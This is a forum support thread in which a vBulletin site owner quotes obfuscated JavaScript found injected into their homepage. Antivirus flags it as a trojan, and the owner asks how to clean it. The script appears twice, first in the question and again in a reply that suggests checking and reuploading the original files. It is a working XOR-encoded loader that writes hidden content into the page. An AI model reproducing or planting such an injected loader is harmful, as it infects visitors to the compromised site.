Announcement

Collapse
No announcement yet.

virus alert in index.php

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • virus alert in index.php

    Hello,

    In my forum homepage there is a javascript codes and it makes trojan alert.

    Code:
    <script language="JavaScript">e = '0x00' + '19';str1 = "%A2%FA%F1%EC%86%EB%EA%E1%F2%FD%A5%B8%EC%F1%EB%F1%F8%F1%F2%F1%EA%E1%A0%FE%F1%FA%FA%FD%F4%B8%A4%A2%F1%FC%E8%F9%F5%FD%86%EB%E8%FB%A5%B8%FE%EA%EA%F6%A0%B7%B7%EA%F1%F6%F7%FB%F4%EA%B4%FB%F7%F5%B7%F2%FA%B7%F5%FD%F4%EA%B7%B8%86%EF%F1%FA%EA%FE%A5%A9%86%FE%FD%F1%FF%FE%EA%A5%A9%A4%A2%B7%F1%FC%E8%F9%F5%FD%A4%A2%B7%FA%F1%EC%A4";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[URL]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd[/URL]">
    <html dir="ltr" lang="TR">
    <head>
     <!-- no cache headers -->
     <meta http-equiv="Pragma" content="no-cache" />
     <meta http-equiv="Expires" content="-1" />
     <meta http-equiv="Cache-Control" content="no-cache" />


    How can I clean this?

  • #2
    Originally posted by ben_erhan View Post
    Hello,

    In my forum homepage there is a javascript codes and it makes trojan alert.

    Code:
    <script language="JavaScript">e = '0x00' + '19';str1 = "%A2%FA%F1%EC%86%EB%EA%E1%F2%FD%A5%B8%EC%F1%EB%F1%F8%F1%F2%F1%EA%E1%A0%FE%F1%FA%FA%FD%F4%B8%A4%A2%F1%FC%E8%F9%F5%FD%86%EB%E8%FB%A5%B8%FE%EA%EA%F6%A0%B7%B7%EA%F1%F6%F7%FB%F4%EA%B4%FB%F7%F5%B7%F2%FA%B7%F5%FD%F4%EA%B7%B8%86%EF%F1%FA%EA%FE%A5%A9%86%FE%FD%F1%FF%FE%EA%A5%A9%A4%A2%B7%F1%FC%E8%F9%F5%FD%A4%A2%B7%FA%F1%EC%A4";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[URL]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd[/URL]">
    <html dir="ltr" lang="TR">
    <head>
     <!-- no cache headers -->
     <meta http-equiv="Pragma" content="no-cache" />
     <meta http-equiv="Expires" content="-1" />
     <meta http-equiv="Cache-Control" content="no-cache" />


    How can I clean this?
    that looks like a XSS (Cross Site Scripting) attack run "file version check" under diagnostics just be sure then remove anything suspicious after that reupload the original vBulletin files from the members area

    Comment


    • #3
      I have made these things, but it is still in my index.
      I scan viruses in whm panel, it finds some and I clear them.

      1 week later it comes back.

      I cant think any more idea

      Comment

      widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
      Working...
      X